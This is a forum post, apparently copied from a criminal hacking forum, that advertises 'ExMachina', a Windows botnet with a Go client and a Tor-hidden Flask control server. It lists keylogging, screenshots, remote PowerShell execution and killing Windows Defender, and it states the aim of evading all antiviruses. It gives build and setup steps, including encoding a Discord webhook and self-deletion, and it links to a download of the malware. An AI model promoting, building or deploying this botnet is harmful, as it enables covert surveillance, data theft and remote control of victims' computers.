February 14

 ExMachina - Botnet for Windows

Hello friends, we present ExMachina - a botnet for Windows. The client is written in the Golang programming language, and the control server is written in Python using the Flask web framework. , which uses the Tor network to communicate with bots.

Functions:
- Anonymous C2C server thanks to the Tor network
- Listen to user keyboard input
- taking screenshots
- Run PowerShell commands
- try killing Windows Defender processes

Notes that this project is not yet complete as more testing is required to bypass all existing antiviruses, so the to-do list is improving the code so that it bypasses all possible antiviruses and adding a function to run encrypted shellcode.
for the hardware you need a server for at least 4GB of ram and 2cpu cores, as for the software: Tor, nginx(optional), python, and Go
use:
set up a hidden tor server
encode the entire onionv3 address, Discord webhook and executable name because it will try to delete itself
edit main.go adding new Base64 encoded data

Bash:

cd ExMachina
GOOS=windows go build -ldflags="-w -s -H=windowsgui"

the output executable is about 6.5 MB
start the server by running python wsgi.py(for debugging and testing python test.py), register admin (default admin username is "ErenYeager", you can change it if you want) go to /register route and register admin password
enjoy

https://send.exploit.in/download/59d81dee7efd1cfa/#JSeoavfgjRanR0xx0mOllg

author : https://xss.is/members/326294/

source : xss.is